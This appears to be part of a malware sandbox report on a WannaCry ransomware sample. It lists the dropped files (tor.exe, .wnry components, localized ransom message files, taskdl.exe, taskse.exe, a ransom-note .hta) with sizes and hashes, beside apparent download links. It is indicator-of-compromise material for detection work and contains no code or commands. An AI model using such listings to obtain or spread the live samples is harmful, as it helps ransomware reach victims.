                                                                                                                                    202e0f7f95e5a11eadb5126551ba53cf7741f030067dbea609fc4ba1bc8851297b0c16c1f31214779ea65f9fa18b1052cc4119be254b47ea9eccbb4371bd8e3d

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\tor.exe
                                                                                                                                    Filesize

                                                                                                                                    3.0MB

                                                                                                                                    MD5

                                                                                                                                    fe7eb54691ad6e6af77f8a9a0b6de26d

                                                                                                                                    SHA1

                                                                                                                                    53912d33bec3375153b7e4e68b78d66dab62671a

                                                                                                                                    SHA256

                                                                                                                                    e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

                                                                                                                                    SHA512

                                                                                                                                    8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\b.wnry
                                                                                                                                    Filesize

                                                                                                                                    1.4MB

                                                                                                                                    MD5

                                                                                                                                    c17170262312f3be7027bc2ca825bf0c

                                                                                                                                    SHA1

                                                                                                                                    f19eceda82973239a1fdc5826bce7691e5dcb4fb

                                                                                                                                    SHA256

                                                                                                                                    d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

                                                                                                                                    SHA512

                                                                                                                                    c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\c.wnry
                                                                                                                                    Filesize

                                                                                                                                    780B

                                                                                                                                    MD5

                                                                                                                                    93f33b83f1f263e2419006d6026e7bc1

                                                                                                                                    SHA1

                                                                                                                                    1a4b36c56430a56af2e0ecabd754bf00067ce488

                                                                                                                                    SHA256

                                                                                                                                    ef0ed0b717d1b956eb6c42ba1f4fd2283cf7c8416bed0afd1e8805ee0502f2b4

                                                                                                                                    SHA512

                                                                                                                                    45bdd1a9a3118ee4d3469ee65a7a8fdb0f9315ca417821db058028ffb0ed145209f975232a9e64aba1c02b9664c854232221eb041d09231c330ae510f638afac

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\m.vbs
                                                                                                                                    Filesize

                                                                                                                                    279B

                                                                                                                                    MD5

                                                                                                                                    e9c14ec69b88c31071e0d1f0ae3bf2ba

                                                                                                                                    SHA1

                                                                                                                                    b0eaefa9ca72652aa177c1efdf1d22777e37ea84

                                                                                                                                    SHA256

                                                                                                                                    99af07e8064d0a04d6b706c870f2a02c42f167ffe98fce549aabc450b305a1e6

                                                                                                                                    SHA512

                                                                                                                                    fdd336b2c3217829a2eeffa6e2b116391b961542c53eb995d09ad346950b8c87507ad9891decd48f8f9286d36b2971417a636b86631a579e6591c843193c1981

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_bulgarian.wnry
                                                                                                                                    Filesize

                                                                                                                                    46KB

                                                                                                                                    MD5

                                                                                                                                    95673b0f968c0f55b32204361940d184

                                                                                                                                    SHA1

                                                                                                                                    81e427d15a1a826b93e91c3d2fa65221c8ca9cff

                                                                                                                                    SHA256

                                                                                                                                    40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd

                                                                                                                                    SHA512

                                                                                                                                    7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_chinese (simplified).wnry
                                                                                                                                    Filesize

                                                                                                                                    53KB

                                                                                                                                    MD5

                                                                                                                                    0252d45ca21c8e43c9742285c48e91ad

                                                                                                                                    SHA1

                                                                                                                                    5c14551d2736eef3a1c1970cc492206e531703c1

                                                                                                                                    SHA256

                                                                                                                                    845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a

                                                                                                                                    SHA512

                                                                                                                                    1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_chinese (traditional).wnry
                                                                                                                                    Filesize

                                                                                                                                    77KB

                                                                                                                                    MD5

                                                                                                                                    2efc3690d67cd073a9406a25005f7cea

                                                                                                                                    SHA1

                                                                                                                                    52c07f98870eabace6ec370b7eb562751e8067e9

                                                                                                                                    SHA256

                                                                                                                                    5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a

                                                                                                                                    SHA512

                                                                                                                                    0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_croatian.wnry
                                                                                                                                    Filesize

                                                                                                                                    38KB

                                                                                                                                    MD5

                                                                                                                                    17194003fa70ce477326ce2f6deeb270

                                                                                                                                    SHA1

                                                                                                                                    e325988f68d327743926ea317abb9882f347fa73

                                                                                                                                    SHA256

                                                                                                                                    3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171

                                                                                                                                    SHA512

                                                                                                                                    dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_czech.wnry
                                                                                                                                    Filesize

                                                                                                                                    39KB

                                                                                                                                    MD5

                                                                                                                                    537efeecdfa94cc421e58fd82a58ba9e

                                                                                                                                    SHA1

                                                                                                                                    3609456e16bc16ba447979f3aa69221290ec17d0

                                                                                                                                    SHA256

                                                                                                                                    5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150

                                                                                                                                    SHA512

                                                                                                                                    e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_danish.wnry
                                                                                                                                    Filesize

                                                                                                                                    36KB

                                                                                                                                    MD5

                                                                                                                                    2c5a3b81d5c4715b7bea01033367fcb5

                                                                                                                                    SHA1

                                                                                                                                    b548b45da8463e17199daafd34c23591f94e82cd

                                                                                                                                    SHA256

                                                                                                                                    a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6

                                                                                                                                    SHA512

                                                                                                                                    490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_dutch.wnry
                                                                                                                                    Filesize

                                                                                                                                    36KB

                                                                                                                                    MD5

                                                                                                                                    7a8d499407c6a647c03c4471a67eaad7

                                                                                                                                    SHA1

                                                                                                                                    d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b

                                                                                                                                    SHA256

                                                                                                                                    2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c

                                                                                                                                    SHA512

                                                                                                                                    608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_english.wnry
                                                                                                                                    Filesize

                                                                                                                                    36KB

                                                                                                                                    MD5

                                                                                                                                    fe68c2dc0d2419b38f44d83f2fcf232e

                                                                                                                                    SHA1

                                                                                                                                    6c6e49949957215aa2f3dfb72207d249adf36283

                                                                                                                                    SHA256

                                                                                                                                    26fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5

                                                                                                                                    SHA512

                                                                                                                                    941fa0a1f6a5756ed54260994db6158a7ebeb9e18b5c8ca2f6530c579bc4455918df0b38c609f501ca466b3cc067b40e4b861ad6513373b483b36338ae20a810

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_filipino.wnry
                                                                                                                                    Filesize

                                                                                                                                    36KB

                                                                                                                                    MD5

                                                                                                                                    08b9e69b57e4c9b966664f8e1c27ab09

                                                                                                                                    SHA1

                                                                                                                                    2da1025bbbfb3cd308070765fc0893a48e5a85fa

                                                                                                                                    SHA256

                                                                                                                                    d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324

                                                                                                                                    SHA512

                                                                                                                                    966b5ed68be6b5ccd46e0de1fa868cfe5432d9bf82e1e2f6eb99b2aef3c92f88d96f4f4eec5e16381b9c6db80a68071e7124ca1474d664bdd77e1817ec600cb4

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_finnish.wnry
                                                                                                                                    Filesize

                                                                                                                                    37KB

                                                                                                                                    MD5

                                                                                                                                    35c2f97eea8819b1caebd23fee732d8f

                                                                                                                                    SHA1

                                                                                                                                    e354d1cc43d6a39d9732adea5d3b0f57284255d2

                                                                                                                                    SHA256

                                                                                                                                    1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

                                                                                                                                    SHA512

                                                                                                                                    908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_french.wnry
                                                                                                                                    Filesize

                                                                                                                                    37KB

                                                                                                                                    MD5

                                                                                                                                    4e57113a6bf6b88fdd32782a4a381274

                                                                                                                                    SHA1

                                                                                                                                    0fccbc91f0f94453d91670c6794f71348711061d

                                                                                                                                    SHA256

                                                                                                                                    9bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc

                                                                                                                                    SHA512

                                                                                                                                    4f1918a12269c654d44e9d394bc209ef0bc32242be8833a2fba437b879125177e149f56f2fb0c302330dec328139b34982c04b3fefb045612b6cc9f83ec85aa9

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_german.wnry
                                                                                                                                    Filesize

                                                                                                                                    36KB

                                                                                                                                    MD5

                                                                                                                                    3d59bbb5553fe03a89f817819540f469

                                                                                                                                    SHA1

                                                                                                                                    26781d4b06ff704800b463d0f1fca3afd923a9fe

                                                                                                                                    SHA256

                                                                                                                                    2adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61

                                                                                                                                    SHA512

                                                                                                                                    95719ae80589f71209bb3cb953276538040e7111b994d757b0a24283aefe27aadbbe9eef3f1f823ce4cabc1090946d4a2a558607ac6cac6faca5971529b34dac

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_greek.wnry
                                                                                                                                    Filesize

                                                                                                                                    47KB

                                                                                                                                    MD5

                                                                                                                                    fb4e8718fea95bb7479727fde80cb424

                                                                                                                                    SHA1

                                                                                                                                    1088c7653cba385fe994e9ae34a6595898f20aeb

                                                                                                                                    SHA256

                                                                                                                                    e13cc9b13aa5074dc45d50379eceb17ee39a0c2531ab617d93800fe236758ca9

                                                                                                                                    SHA512

                                                                                                                                    24db377af1569e4e2b2ebccec42564cea95a30f1ff43bcaf25a692f99567e027bcef4aacef008ec5f64ea2eef0c04be88d2b30bcadabb3919b5f45a6633940cb

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_indonesian.wnry
                                                                                                                                    Filesize

                                                                                                                                    36KB

                                                                                                                                    MD5

                                                                                                                                    3788f91c694dfc48e12417ce93356b0f

                                                                                                                                    SHA1

                                                                                                                                    eb3b87f7f654b604daf3484da9e02ca6c4ea98b7

                                                                                                                                    SHA256

                                                                                                                                    23e5e738aad10fb8ef89aa0285269aff728070080158fd3e7792fe9ed47c51f4

                                                                                                                                    SHA512

                                                                                                                                    b7dd9e6dc7c2d023ff958caf132f0544c76fae3b2d8e49753257676cc541735807b4befdf483bcae94c2dcde3c878c783b4a89dca0fecbc78f5bbf7c356f35cd

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_italian.wnry
                                                                                                                                    Filesize

                                                                                                                                    36KB

                                                                                                                                    MD5

                                                                                                                                    30a200f78498990095b36f574b6e8690

                                                                                                                                    SHA1

                                                                                                                                    c4b1b3c087bd12b063e98bca464cd05f3f7b7882

                                                                                                                                    SHA256

                                                                                                                                    49f2c739e7d9745c0834dc817a71bf6676ccc24a4c28dcddf8844093aab3df07

                                                                                                                                    SHA512

                                                                                                                                    c0da2aae82c397f6943a0a7b838f60eeef8f57192c5f498f2ecf05db824cfeb6d6ca830bf3715da7ee400aa8362bd64dc835298f3f0085ae7a744e6e6c690511

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_japanese.wnry
                                                                                                                                    Filesize

                                                                                                                                    79KB

                                                                                                                                    MD5

                                                                                                                                    b77e1221f7ecd0b5d696cb66cda1609e

                                                                                                                                    SHA1

                                                                                                                                    51eb7a254a33d05edf188ded653005dc82de8a46

                                                                                                                                    SHA256

                                                                                                                                    7e491e7b48d6e34f916624c1cda9f024e86fcbec56acda35e27fa99d530d017e

                                                                                                                                    SHA512

                                                                                                                                    f435fd67954787e6b87460db026759410fbd25b2f6ea758118749c113a50192446861a114358443a129be817020b50f21d27b1ebd3d22c7be62082e8b45223fc

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_korean.wnry
                                                                                                                                    Filesize

                                                                                                                                    89KB

                                                                                                                                    MD5

                                                                                                                                    6735cb43fe44832b061eeb3f5956b099

                                                                                                                                    SHA1

                                                                                                                                    d636daf64d524f81367ea92fdafa3726c909bee1

                                                                                                                                    SHA256

                                                                                                                                    552aa0f82f37c9601114974228d4fc54f7434fe3ae7a276ef1ae98a0f608f1d0

                                                                                                                                    SHA512

                                                                                                                                    60272801909dbba21578b22c49f6b0ba8cd0070f116476ff35b3ac8347b987790e4cc0334724244c4b13415a246e77a577230029e4561ae6f04a598c3f536c7e

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_latvian.wnry
                                                                                                                                    Filesize

                                                                                                                                    40KB

                                                                                                                                    MD5

                                                                                                                                    c33afb4ecc04ee1bcc6975bea49abe40

                                                                                                                                    SHA1

                                                                                                                                    fbea4f170507cde02b839527ef50b7ec74b4821f

                                                                                                                                    SHA256

                                                                                                                                    a0356696877f2d94d645ae2df6ce6b370bd5c0d6db3d36def44e714525de0536

                                                                                                                                    SHA512

                                                                                                                                    0d435f0836f61a5ff55b78c02fa47b191e5807a79d8a6e991f3115743df2141b3db42ba8bdad9ad259e12f5800828e9e72d7c94a6a5259312a447d669b03ec44

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_norwegian.wnry
                                                                                                                                    Filesize

                                                                                                                                    36KB

                                                                                                                                    MD5

                                                                                                                                    ff70cc7c00951084175d12128ce02399

                                                                                                                                    SHA1

                                                                                                                                    75ad3b1ad4fb14813882d88e952208c648f1fd18

                                                                                                                                    SHA256

                                                                                                                                    cb5da96b3dfcf4394713623dbf3831b2a0b8be63987f563e1c32edeb74cb6c3a

                                                                                                                                    SHA512

                                                                                                                                    f01df3256d49325e5ec49fd265aa3f176020c8ffec60eb1d828c75a3fa18ff8634e1de824d77dfdd833768acff1f547303104620c70066a2708654a07ef22e19

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_polish.wnry
                                                                                                                                    Filesize

                                                                                                                                    38KB

                                                                                                                                    MD5

                                                                                                                                    e79d7f2833a9c2e2553c7fe04a1b63f4

                                                                                                                                    SHA1

                                                                                                                                    3d9f56d2381b8fe16042aa7c4feb1b33f2baebff

                                                                                                                                    SHA256

                                                                                                                                    519ad66009a6c127400c6c09e079903223bd82ecc18ad71b8e5cd79f5f9c053e

                                                                                                                                    SHA512

                                                                                                                                    e0159c753491cac7606a7250f332e87bc6b14876bc7a1cf5625fa56ab4f09c485f7b231dd52e4ff0f5f3c29862afb1124c0efd0741613eb97a83cbe2668af5de

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_portuguese.wnry
                                                                                                                                    Filesize

                                                                                                                                    37KB

                                                                                                                                    MD5

                                                                                                                                    fa948f7d8dfb21ceddd6794f2d56b44f

                                                                                                                                    SHA1

                                                                                                                                    ca915fbe020caa88dd776d89632d7866f660fc7a

                                                                                                                                    SHA256

                                                                                                                                    bd9f4b3aedf4f81f37ec0a028aabcb0e9a900e6b4de04e9271c8db81432e2a66

                                                                                                                                    SHA512

                                                                                                                                    0d211bfb0ae953081dca00cd07f8c908c174fd6c47a8001fadc614203f0e55d9fbb7fa9b87c735d57101341ab36af443918ee00737ed4c19ace0a2b85497f41a

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_romanian.wnry
                                                                                                                                    Filesize

                                                                                                                                    50KB

                                                                                                                                    MD5

                                                                                                                                    313e0ececd24f4fa1504118a11bc7986

                                                                                                                                    SHA1

                                                                                                                                    e1b9ae804c7fb1d27f39db18dc0647bb04e75e9d

                                                                                                                                    SHA256

                                                                                                                                    70c0f32ed379ae899e5ac975e20bbbacd295cf7cd50c36174d2602420c770ac1

                                                                                                                                    SHA512

                                                                                                                                    c7500363c61baf8b77fce796d750f8f5e6886ff0a10f81c3240ea3ad4e5f101b597490dea8ab6bd9193457d35d8fd579fce1b88a1c8d85ebe96c66d909630730

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_russian.wnry
                                                                                                                                    Filesize

                                                                                                                                    46KB

                                                                                                                                    MD5

                                                                                                                                    452615db2336d60af7e2057481e4cab5

                                                                                                                                    SHA1

                                                                                                                                    442e31f6556b3d7de6eb85fbac3d2957b7f5eac6

                                                                                                                                    SHA256

                                                                                                                                    02932052fafe97e6acaaf9f391738a3a826f5434b1a013abbfa7a6c1ade1e078

                                                                                                                                    SHA512

                                                                                                                                    7613dc329abe7a3f32164c9a6b660f209a84b774ab9c008bf6503c76255b30ea9a743a6dc49a8de8df0bcb9aea5a33f7408ba27848d9562583ff51991910911f

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_slovak.wnry
                                                                                                                                    Filesize

                                                                                                                                    40KB

                                                                                                                                    MD5

                                                                                                                                    c911aba4ab1da6c28cf86338ab2ab6cc

                                                                                                                                    SHA1

                                                                                                                                    fee0fd58b8efe76077620d8abc7500dbfef7c5b0

                                                                                                                                    SHA256

                                                                                                                                    e64178e339c8e10eac17a236a67b892d0447eb67b1dcd149763dad6fd9f72729

                                                                                                                                    SHA512

                                                                                                                                    3491ed285a091a123a1a6d61aafbb8d5621ccc9e045a237a2f9c2cf6049e7420eb96ef30fdcea856b50454436e2ec468770f8d585752d73fafd676c4ef5e800a

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_spanish.wnry
                                                                                                                                    Filesize

                                                                                                                                    36KB

                                                                                                                                    MD5

                                                                                                                                    8d61648d34cba8ae9d1e2a219019add1

                                                                                                                                    SHA1

                                                                                                                                    2091e42fc17a0cc2f235650f7aad87abf8ba22c2

                                                                                                                                    SHA256

                                                                                                                                    72f20024b2f69b45a1391f0a6474e9f6349625ce329f5444aec7401fe31f8de1

                                                                                                                                    SHA512

                                                                                                                                    68489c33ba89edfe2e3aebaacf8ef848d2ea88dcbef9609c258662605e02d12cfa4ffdc1d266fc5878488e296d2848b2cb0bbd45f1e86ef959bab6162d284079

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_swedish.wnry
                                                                                                                                    Filesize

                                                                                                                                    37KB

                                                                                                                                    MD5

                                                                                                                                    c7a19984eb9f37198652eaf2fd1ee25c

                                                                                                                                    SHA1

                                                                                                                                    06eafed025cf8c4d76966bf382ab0c5e1bd6a0ae

                                                                                                                                    SHA256

                                                                                                                                    146f61db72297c9c0facffd560487f8d6a2846ecec92ecc7db19c8d618dbc3a4

                                                                                                                                    SHA512

                                                                                                                                    43dd159f9c2eac147cbff1dda83f6a83dd0c59d2d7acac35ba8b407a04ec9a1110a6a8737535d060d100ede1cb75078cf742c383948c9d4037ef459d150f6020

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_turkish.wnry
                                                                                                                                    Filesize

                                                                                                                                    41KB

                                                                                                                                    MD5

                                                                                                                                    531ba6b1a5460fc9446946f91cc8c94b

                                                                                                                                    SHA1

                                                                                                                                    cc56978681bd546fd82d87926b5d9905c92a5803

                                                                                                                                    SHA256

                                                                                                                                    6db650836d64350bbde2ab324407b8e474fc041098c41ecac6fd77d632a36415

                                                                                                                                    SHA512

                                                                                                                                    ef25c3cf4343df85954114f59933c7cc8107266c8bcac3b5ea7718eb74dbee8ca8a02da39057e6ef26b64f1dfccd720dd3bf473f5ae340ba56941e87d6b796c9

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_vietnamese.wnry
                                                                                                                                    Filesize

                                                                                                                                    91KB

                                                                                                                                    MD5

                                                                                                                                    8419be28a0dcec3f55823620922b00fa

                                                                                                                                    SHA1

                                                                                                                                    2e4791f9cdfca8abf345d606f313d22b36c46b92

                                                                                                                                    SHA256

                                                                                                                                    1f21838b244c80f8bed6f6977aa8a557b419cf22ba35b1fd4bf0f98989c5bdf8

                                                                                                                                    SHA512

                                                                                                                                    8fca77e54480aea3c0c7a705263ed8fb83c58974f5f0f62f12cc97c8e0506ba2cdb59b70e59e9a6c44dd7cde6adeeec35b494d31a6a146ff5ba7006136ab9386

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\r.wnry
                                                                                                                                    Filesize

                                                                                                                                    864B

                                                                                                                                    MD5

                                                                                                                                    3e0020fc529b1c2a061016dd2469ba96

                                                                                                                                    SHA1

                                                                                                                                    c3a91c22b63f6fe709e7c29cafb29a2ee83e6ade

                                                                                                                                    SHA256

                                                                                                                                    402751fa49e0cb68fe052cb3db87b05e71c1d950984d339940cf6b29409f2a7c

                                                                                                                                    SHA512

                                                                                                                                    5ca3c134201ed39d96d72911c0498bae6f98701513fd7f1dc8512819b673f0ea580510fa94ed9413ccc73da18b39903772a7cbfa3478176181cee68c896e14cf

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\s.wnry
                                                                                                                                    Filesize

                                                                                                                                    2.9MB

                                                                                                                                    MD5

                                                                                                                                    ad4c9de7c8c40813f200ba1c2fa33083

                                                                                                                                    SHA1

                                                                                                                                    d1af27518d455d432b62d73c6a1497d032f6120e

                                                                                                                                    SHA256

                                                                                                                                    e18fdd912dfe5b45776e68d578c3af3547886cf1353d7086c8bee037436dff4b

                                                                                                                                    SHA512

                                                                                                                                    115733d08e5f1a514808a20b070db7ff453fd149865f49c04365a8c6502fa1e5c3a31da3e21f688ab040f583cf1224a544aea9708ffab21405dde1c57f98e617

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\t.wnry
                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                    MD5

                                                                                                                                    5dcaac857e695a65f5c3ef1441a73a8f

                                                                                                                                    SHA1

                                                                                                                                    7b10aaeee05e7a1efb43d9f837e9356ad55c07dd

                                                                                                                                    SHA256

                                                                                                                                    97ebce49b14c46bebc9ec2448d00e1e397123b256e2be9eba5140688e7bc0ae6

                                                                                                                                    SHA512

                                                                                                                                    06eb5e49d19b71a99770d1b11a5bb64a54bf3352f36e39a153469e54205075c203b08128dc2317259db206ab5323bdd93aaa252a066f57fb5c52ff28deedb5e2

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                                                                    Filesize

                                                                                                                                    20KB

                                                                                                                                    MD5

                                                                                                                                    4fef5e34143e646dbf9907c4374276f5

                                                                                                                                    SHA1

                                                                                                                                    47a9ad4125b6bd7c55e4e7da251e23f089407b8f

                                                                                                                                    SHA256

                                                                                                                                    4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79

                                                                                                                                    SHA512

                                                                                                                                    4550dd1787deb353ebd28363dd2cdccca861f6a5d9358120fa6aa23baa478b2a9eb43cef5e3f6426f708a0753491710ac05483fac4a046c26bec4234122434d5

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                                                                    Filesize

                                                                                                                                    20KB

                                                                                                                                    MD5

                                                                                                                                    8495400f199ac77853c53b5a3f278f3e

                                                                                                                                    SHA1

                                                                                                                                    be5d6279874da315e3080b06083757aad9b32c23

                                                                                                                                    SHA256

                                                                                                                                    2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d

                                                                                                                                    SHA512

                                                                                                                                    0669c524a295a049fa4629b26f89788b2a74e1840bcdc50e093a0bd40830dd1279c9597937301c0072db6ece70adee4ace67c3c8a4fb2db6deafd8f1e887abe4

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\u.wnry
                                                                                                                                    Filesize

                                                                                                                                    240KB

                                                                                                                                    MD5

                                                                                                                                    7bf2b57f2a205768755c07f238fb32cc

                                                                                                                                    SHA1

                                                                                                                                    45356a9dd616ed7161a3b9192e2f318d0ab5ad10

                                                                                                                                    SHA256

                                                                                                                                    b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

                                                                                                                                    SHA512

                                                                                                                                    91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4mhhjddz.dib.ps1
                                                                                                                                    Filesize

                                                                                                                                    1B

                                                                                                                                    MD5

                                                                                                                                    c4ca4238a0b923820dcc509a6f75849b

                                                                                                                                    SHA1

                                                                                                                                    356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                                                    SHA256

                                                                                                                                    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                                                    SHA512

                                                                                                                                    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\OneNote\16.0\_R_E_A_D___T_H_I_S___K5YY_.hta
                                                                                                                                    Filesize

                                                                                                                                    75KB

                                                                                                                                    MD5

                                                                                                                                    e085ec1765454ed4c02934eea611a5bd

                                                                                                                                    SHA1

                                                                                                                                    59559028c9491b3ddc3f3fe26b67607a7dcd39f3

                                                                                                                                    SHA256

                                                                                                                                    aabffdbfb119f27ad48d051814eafdc3d14164ee4cd8dd74597fac13b6fa5086

                                                                                                                                    SHA512

                                                                                                                                    e5c9166a470c4db60ecf7d1ba26055a002ed9049720de80f2e7fe88d1fc35b976b1ee243373e9e053bdd5200a470cefff65015120389b949476a6f1410953d0c

                                                                                                                                    Download Submit

